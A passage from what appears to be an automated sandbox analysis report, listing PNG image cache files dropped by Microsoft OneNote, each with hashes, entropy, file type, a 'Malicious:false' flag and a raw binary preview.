                                                                                                                                                                                                          MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                          SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                          SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                          SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003D.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.950380155401321
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                          MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                          SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                          SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                          SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003E.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2270
                                                                                                                                                                                                          Entropy (8bit):7.845368393313232
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                          MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                          SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                          SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                          SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W...*.F......@.*.(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!*.&E.....n...=.@..Sp.GF..c*....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~l*k.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N*..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003F.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):8184
                                                                                                                                                                                                          Entropy (8bit):7.807848176906598
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                          MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                          SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                          SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                          SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003G.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2599
                                                                                                                                                                                                          Entropy (8bit):7.903700862190034
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                          MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                          SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                          SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                          SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003H.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):22634
                                                                                                                                                                                                          Entropy (8bit):7.974332204835705
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                          MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                          SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                          SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                          SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003I.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1570
                                                                                                                                                                                                          Entropy (8bit):7.780157858994452
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                          MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                          SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                          SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                          SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003J.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11449
                                                                                                                                                                                                          Entropy (8bit):7.91552812501629
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                          MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                          SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                          SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                          SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000003K.bin (copy)

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4081
                                                                                                                                                                                                          Entropy (8bit):7.943373267196131
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                          MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                          SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                          SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                          SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a.......*.....k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5...*.F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....*zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U*.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.*.* 8T=/'9,*.KDW...GN;0(P3_....1......'.;..;|.L.a.&<*\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\header

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:Matlab v4 mat-file (little endian) \200, numeric, rows 262223750, columns 0
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                                                          Entropy (8bit):2.3713571991456197
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ulXwtLbMLzTtE/xtl:KaQLzu/xX
                                                                                                                                                                                                          MD5:2F06125407AD183EBE228947488221E4
                                                                                                                                                                                                          SHA1:FED7F9D3745CF72B8AB3577A58C0E3A6857E3939
                                                                                                                                                                                                          SHA-256:48BB48FB8C0E9DF433AE8F5248A576D8B3623B630D8583D83E62776EE15C9C35
                                                                                                                                                                                                          SHA-512:49C5E568294C40047423F12912DDCE46941C74DFACE8BCA18FCE64C63FDC1B9FDF2A85D519372B91093585375E15A47B1458B0FA3AA2C7FD4A0ADA55A9C79E15
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.....7..........6..............................@4...l...................

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000005.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3679
                                                                                                                                                                                                          Entropy (8bit):7.931319059366604
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                          MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                          SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                          SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                          SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.|.y|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<.*.....{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy*..ET.PM...c....~(.g..**...ol.K......Sc8..q.F.KM"<...:t.O.>b..$*t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@*D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`....*........M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000006.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2232
                                                                                                                                                                                                          Entropy (8bit):7.837610270261933
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                          MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                          SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                          SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                          SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000007.bin

                                                                                                                                                                                                          Download File
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
